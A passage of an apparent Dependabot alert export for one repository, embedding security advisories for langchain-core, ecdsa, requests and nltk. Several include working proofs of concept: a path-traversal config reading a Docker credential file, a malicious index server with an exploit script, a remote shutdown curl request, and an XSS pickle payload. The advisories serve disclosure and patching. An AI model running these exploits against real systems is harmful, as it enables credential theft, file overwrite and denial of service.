\"input_variables\": [],\n}\nprompt = load_prompt_from_config(config)\n\n# Reads arbitrary .json via few-shot examples\nconfig = {\n \"_type\": \"few_shot\",\n \"examples\": \"../../../../.docker/config.json\",\n \"example_prompt\": {\n \"_type\": \"prompt\",\n \"input_variables\": [\"input\", \"output\"],\n \"template\": \"{input}: {output}\",\n },\n \"prefix\": \"\",\n \"suffix\": \"{query}\",\n \"input_variables\": [\"query\"],\n}\nprompt = load_prompt_from_config(config)\n```\n\n## Mitigation\n\n**Update `langchain-core` to >= 1.2.22.**\n\nThe fix adds path validation that rejects absolute paths and `..` traversal sequences by default. An `allow_dangerous_paths=True` keyword argument is available on `load_prompt()` and `load_prompt_from_config()` for trusted inputs.\n\nAs described above, these legacy APIs have been formally deprecated. Users should migrate to `dumpd`/`dumps`/`load`/`loads` from `langchain_core.load`.\n\n## Credit\n\n- [jiayuqi7813](https://github.com/jiayuqi7813) reporter\n- [VladimirEliTokarev](https://github.com/VladimirEliTokarev) reporter\n- [Rickidevs](https://github.com/Rickidevs) reporter\n- Kenneth Cox (cczine@gmail.com) reporter","severity":"high","identifiers":[{"value":"GHSA-qh6h-p6c9-ff54","type":"GHSA"},{"value":"CVE-2026-34070","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-qh6h-p6c9-ff54"},{"url":"https://github.com/langchain-ai/langchain/commit/27add913474e01e33bededf4096151130ba0d47c"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core==1.2.22"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34070"},{"url":"https://github.com/advisories/GHSA-qh6h-p6c9-ff54"}],"published_at":"2026-03-27T19:45:00Z","updated_at":"2026-03-31T18:41:15Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"< 
1.2.22","first_patched_version":{"identifier":"1.2.22"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00035,"percentile":0.10523},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","score":7.5},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"< 1.2.22","first_patched_version":{"identifier":"1.2.22"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/38","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/38","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":37,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ecdsa"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-9f5j-8jwj-x28g","cve_id":"CVE-2026-33936","summary":"python-ecdsa: Denial of Service via improper DER length validation in crafted private keys","description":"## Summary\n\nAn issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions.\n\n1. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected.\n\n2. 
Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service.\n\n## Impact\n\nPotential denial-of-service when parsing untrusted DER private keys due to unexpected internal exceptions, and malformed DER acceptance due to missing bounds checks in DER helper functions.\n\n## Reproduction\n\nAttach and run the following PoCs:\n\n### poc_truncated_der_octet.py\n\n```python\nfrom ecdsa.der import remove_octet_string, UnexpectedDER\n\n# OCTET STRING (0x04)\n# Declared length: 0x82 0x10 0x00 -> 4096 bytes\n# Actual body: only 3 bytes -> truncated DER\nbad = b\"\\x04\\x82\\x10\\x00\" + b\"ABC\"\n\ntry:\n body, rest = remove_octet_string(bad)\n print(\"[BUG] remove_octet_string accepted truncated DER.\")\n print(\"Declared length=4096, actual body_len=\", len(body), \"rest_len=\", len(rest))\n print(\"Body=\", body)\n print(\"Rest=\", rest)\nexcept UnexpectedDER as e:\n print(\"[OK] Rejected malformed DER:\", e)\n```\n\n- Expected: reject malformed DER when declared length exceeds available bytes\n- Actual: accepts the truncated DER and returns a shorter body\n- Example output:\n```\nParsed body_len= 3 rest_len= 0 (while declared length is 4096)\n```\n\n### poc_signingkey_from_der_indexerror.py\n\n```python\nfrom ecdsa import SigningKey, NIST256p\nimport ecdsa\n\nprint(\"ecdsa version:\", ecdsa.__version__)\n\nsk = SigningKey.generate(curve=NIST256p)\ngood = sk.to_der()\nprint(\"Good DER len:\", len(good))\n\n\ndef find_crashing_mutation(data: bytes):\n b = bytearray(data)\n\n # Try every OCTET STRING tag position and corrupt a short-form length byte\n for i in range(len(b) - 4):\n if b[i] != 0x04: # OCTET STRING tag\n continue\n\n L = b[i + 1]\n if L >= 
0x80:\n # skip long-form lengths for simplicity\n continue\n\n max_possible = len(b) - (i + 2)\n if max_possible <= 10:\n continue\n\n # Claim more bytes than exist -> truncation\n newL = min(0x7F, max_possible + 20)\n b2 = bytearray(b)\n b2[i + 1] = newL\n\n try:\n SigningKey.from_der(bytes(b2))\n except Exception as e:\n return i, type(e).__name__, str(e)\n\n return None\n\n\nres = find_crashing_mutation(good)\nif res is None:\n print(\"[INFO] No exception triggered by this mutation strategy.\")\nelse:\n i, etype, msg = res\n print(\"[BUG] SigningKey.from_der raised unexpected exception type.\")\n print(\"Offset:\", i, \"Exception:\", etype, \"Message:\", msg)\n```\n\n- Expected: reject malformed DER with `UnexpectedDER` or `ValueError`\n- Actual: deterministically triggers an internal `IndexError` (DoS risk)\n- Example output:\n```\nResult: (5, 'IndexError', 'index out of bounds on dimension 1')\n```\n\n## Suggested fix\n\nAdd “declared length must fit buffer” checks in DER helper functions similarly to the existing check in `remove_sequence()`:\n\n- `remove_octet_string()`\n- `remove_constructed()`\n- `remove_implicit()`\n\nAdditionally, consider catching unexpected internal exceptions in DER key parsing paths and re-raising them as `UnexpectedDER` to avoid crashy failure modes.\n\n## Credit\n\nMohamed Abdelaal 
(@0xmrma)","severity":"medium","identifiers":[{"value":"GHSA-9f5j-8jwj-x28g","type":"GHSA"},{"value":"CVE-2026-33936","type":"CVE"}],"references":[{"url":"https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-9f5j-8jwj-x28g"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/commit/bd66899550d7185939bf27b75713a2ac9325a9d3"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/releases/tag/python-ecdsa-0.19.2"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33936"},{"url":"https://github.com/advisories/GHSA-9f5j-8jwj-x28g"}],"published_at":"2026-03-27T15:56:01Z","updated_at":"2026-03-30T20:17:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"medium","vulnerable_version_range":"< 0.19.2","first_patched_version":{"identifier":"0.19.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00053,"percentile":0.16595},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-130","name":"Improper Handling of Length Parameter Inconsistency"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"medium","vulnerable_version_range":"< 
0.19.2","first_patched_version":{"identifier":"0.19.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/37","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/37","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":36,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"requests"},"manifest_path":"methods/evermemos/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-gc5v-m9x4-r6x2","cve_id":"CVE-2026-25645","summary":"Requests has Insecure Temp File Reuse in its extract_zipped_paths() utility function","description":"### Impact\nThe `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. 
A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one.\n\n### Affected usages\n**Standard usage of the Requests library is not affected by this vulnerability.** Only applications that call `extract_zipped_paths()` directly are impacted.\n\n### Remediation\nUpgrade to at least Requests 2.33.0, where the library now extracts files to a non-deterministic location.\n\nIf developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.","severity":"medium","identifiers":[{"value":"GHSA-gc5v-m9x4-r6x2","type":"GHSA"},{"value":"CVE-2026-25645","type":"CVE"}],"references":[{"url":"https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"},{"url":"https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"},{"url":"https://github.com/psf/requests/releases/tag/v2.33.0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25645"},{"url":"https://github.com/advisories/GHSA-gc5v-m9x4-r6x2"}],"published_at":"2026-03-25T16:56:28Z","updated_at":"2026-03-27T22:07:43Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"requests"},"severity":"medium","vulnerable_version_range":"< 2.33.0","first_patched_version":{"identifier":"2.33.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N","score":4.4},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":5.0e-05,"percentile":0.00243},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N","score":4.4},"cwes":[{"cwe_id":"CWE-377","name":"Insecure Temporary File"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"requests"},"severity":"medium","vulnerable_version_range":"< 
2.33.0","first_patched_version":{"identifier":"2.33.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/36","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/36","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":35,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-469j-vmhf-r6v7","cve_id":"CVE-2026-33236","summary":"NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite","description":"## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. 
Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n ↓\n2. Provides malicious XML: \n ↓\n3. Victim executes: downloader.download('passwd')\n ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n ↓\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. 
Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\n\n \n \n \n\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/malicious_index.xml':\n self.send_response(200)\n self.send_header('Content-type', 'application/xml')\n self.end_headers()\n with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n self.wfile.write(f.read())\n elif self.path == '/test.zip':\n self.send_response(200)\n self.send_header('Content-type', 'application/zip')\n self.end_headers()\n with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n 
print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n print(f\"✗ Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```","severity":"high","identifiers":[{"value":"GHSA-469j-vmhf-r6v7","type":"GHSA"},{"value":"CVE-2026-33236","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33236"},{"url":"https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"},{"url":"https://github.com/advisories/GHSA-469j-vmhf-r6v7"}],"published_at":"2026-03-19T12:42:42Z","updated_at":"2026-03-25T18:21:28Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 
3.9.2","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","score":8.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.0532},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","score":8.1},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/35","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/35","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":34,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-jm6w-m3j8-898g","cve_id":"CVE-2026-33231","summary":"Unauthenticated remote shutdown in nltk.app.wordnet_app","description":"### Summary\n`nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. 
A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service.\n\n### Details\nThe vulnerable logic is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:242`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L242)\n - The server listens on all interfaces:\n - `server = HTTPServer((\"\", port), MyServerHandler)`\n\n- [`nltk/app/wordnet_app.py:87`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L87)\n - Incoming requests are checked for the exact path:\n - `if unquote_plus(sp) == \"SHUTDOWN THE SERVER\":`\n\n- [`nltk/app/wordnet_app.py:88`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L88)\n - The shutdown protection only depends on `server_mode`\n\n- [`nltk/app/wordnet_app.py:93`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L93)\n - In the default mode (`runBrowser=True`, therefore `server_mode=False`), the handler terminates the process directly:\n - `os._exit(0)`\n\nThis means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.\n\n### PoC\n1. Start the WordNet Browser in Docker in its default mode:\n\n```bash\ndocker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)\"\n```\n\n2. Confirm the service is reachable:\n\n```bash\ncurl -s -o /tmp/wn_before.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\n```\n\nObserved result:\n\n```text\n200\n```\n\n3. Trigger shutdown:\n\n```bash\ncurl -s -o /tmp/wn_shutdown.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'\n```\n\nObserved result:\n\n```text\n000\n```\n\n4. 
Verify the service is no longer available:\n\n```bash\ncurl -s -o /tmp/wn_after.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\ndocker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\\t{{.Status}}'\ndocker logs nltk-wordnet-web-default-retest\n```\n\nObserved results:\n\n```text\n000\nnltk-wordnet-web-default-retest Exited (0)\nServer shutting down!\n```\n\n### Impact\nThis is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.\n\nAny reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:\n\n- the route is accessible over HTTP\n- no authentication or CSRF-style confirmation is required\n- the server listens on all interfaces by default\n- the process exits immediately instead of performing a controlled shutdown\n\nThis primarily affects users who run `nltk.app.wordnet_app` and expose or otherwise allow access to its listening port.","severity":"high","identifiers":[{"value":"GHSA-jm6w-m3j8-898g","type":"GHSA"},{"value":"CVE-2026-33231","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-jm6w-m3j8-898g"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33231"},{"url":"https://github.com/nltk/nltk/commit/bbaae83db86a0f49e00f5b0db44a7254c268de9b"},{"url":"https://github.com/advisories/GHSA-jm6w-m3j8-898g"}],"published_at":"2026-03-19T12:42:20Z","updated_at":"2026-04-25T01:23:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 
3.9.3","first_patched_version":{"identifier":"3.9.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.05214},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-306","name":"Missing Authentication for Critical Function"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/34","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/34","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":33,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-gfwx-w7gr-fvh7","cve_id":"CVE-2026-33230","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in nltk","description":"### Summary\n`nltk.app.wordnet_app` contains a reflected cross-site scripting issue in the `lookup_...` route. A crafted `lookup_` URL can inject arbitrary HTML/JavaScript into the response page because attacker-controlled `word` data is reflected into HTML without escaping. 
This impacts users running the local WordNet Browser server and can lead to script execution in the browser origin of that application.\n\n### Details\nThe vulnerable flow is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:144`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L144)\n - Requests starting with `lookup_` are handled as HTML responses:\n - `page, word = page_from_href(sp)`\n\n- [`nltk/app/wordnet_app.py:755`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L755)\n - `page_from_href()` calls `page_from_reference(Reference.decode(href))`\n\n- [`nltk/app/wordnet_app.py:769`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L769)\n - `word = href.word`\n\n- [`nltk/app/wordnet_app.py:796`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L796)\n - If no results are found, `word` is inserted directly into the HTML body:\n - `body = \"The word or words '%s' were not found in the dictionary.\" % word`\n\nThis is inconsistent with the `search` route, which does escape user input:\n\n- [`nltk/app/wordnet_app.py:136`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L136)\n - `word = html.escape(...)`\n\nAs a result, a malicious `lookup_...` payload can inject script into the response page.\n\nThe issue is exploitable because:\n\n- `Reference.decode()` accepts attacker-controlled base64-encoded pickle data for the URL state.\n- The decoded `word` is reflected into HTML without `html.escape()`.\n- The server is started with `HTTPServer((\"\", port), MyServerHandler)`, so it listens on all interfaces by default, not just `localhost`.\n\n### PoC\n1. Start the WordNet Browser in an isolated Docker environment:\n\n```bash\ndocker run -d --name nltk-wordnet-web -p 8002:8002 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8002, False)\"\n```\n\n2. 
Use the following crafted payload, which decodes to:\n\n```python\n(\"\", {})\n```\n\nEncoded payload:\n\n```text\ngAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4=\n```\n\n3. Request the vulnerable route:\n\n```bash\ncurl -s \"http://127.0.0.1:8002/lookup_gAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4=\"\n```\n\n4. Observed result:\n\n```text\nThe word or words '' were not found in the dictionary.\n```\n\"127\"\n\n\nI also validated the issue directly at function level in Docker:\n\n```python\nimport base64\nimport pickle\n\nfrom nltk.app.wordnet_app import page_from_href\n\npayload = base64.urlsafe_b64encode(\n pickle.dumps((\"\", {}), -1)\n).decode()\n\npage, word = page_from_href(payload)\nprint(word)\nprint(\"\" in page)\n```\n\nObserved output:\n\n```text\nWORD= \nHAS_SCRIPT= True\n```\n\n### Impact\nThis is a reflected XSS issue in the NLTK WordNet Browser web UI.\n\nAn attacker who can convince a user to open a crafted `lookup_...` URL can execute arbitrary JavaScript in the origin of the local WordNet Browser application. 
This can be used to:\n\n- run arbitrary script in the browser tab\n- manipulate the page content shown to the user\n- issue same-origin requests to other WordNet Browser routes\n- potentially trigger available UI actions in that local app context\n\nThis primarily impacts users who run `nltk.app.wordnet_app` as a local or self-hosted HTTP service and open attacker-controlled links.","severity":"medium","identifiers":[{"value":"GHSA-gfwx-w7gr-fvh7","type":"GHSA"},{"value":"CVE-2026-33230","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-gfwx-w7gr-fvh7"},{"url":"https://github.com/nltk/nltk/commit/1c3f799607eeb088cab2491dcf806ae83c29ad8f"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33230"},{"url":"https://github.com/nltk/nltk/commit/40d0bc1d484a3458d6a63ecb5ba4957ab16ba14e"},{"url":"https://github.com/advisories/GHSA-gfwx-w7gr-fvh7"}],"published_at":"2026-03-18T20:23:33Z","updated_at":"2026-03-25T18:21:03Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","score":6.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00017,"percentile":0.04074},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","score":6.1},"cwes":[{"cwe_id":"CWE-79","name":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 
3.9.3","first_patched_version":{"identifier":"3.9.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/33","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/33","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":32,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-rf74-v2fm-23pw","cve_id":null,"summary":"Natural Language Toolkit (NLTK) has unbounded recursion in JSONTaggedDecoder.decode_obj() may cause DoS","description":"### Summary\n`JSONTaggedDecoder.decode_obj()` in `nltk/jsontags.py` calls itself \nrecursively without any depth limit. A deeply nested JSON structure \nexceeding `sys.getrecursionlimit()` (default: 1000) will raise an \nunhandled `RecursionError`, crashing the Python process.\n\n### Affected code\nFile: `nltk/jsontags.py`, lines 47–52\n```python\n@classmethod\ndef decode_obj(cls, obj):\n if isinstance(obj, dict):\n obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}\n elif isinstance(obj, list):\n obj = list(cls.decode_obj(val) for val in obj)\n```\n\n### Proof of Concept\n```python\nimport sys, json\nfrom nltk.jsontags import 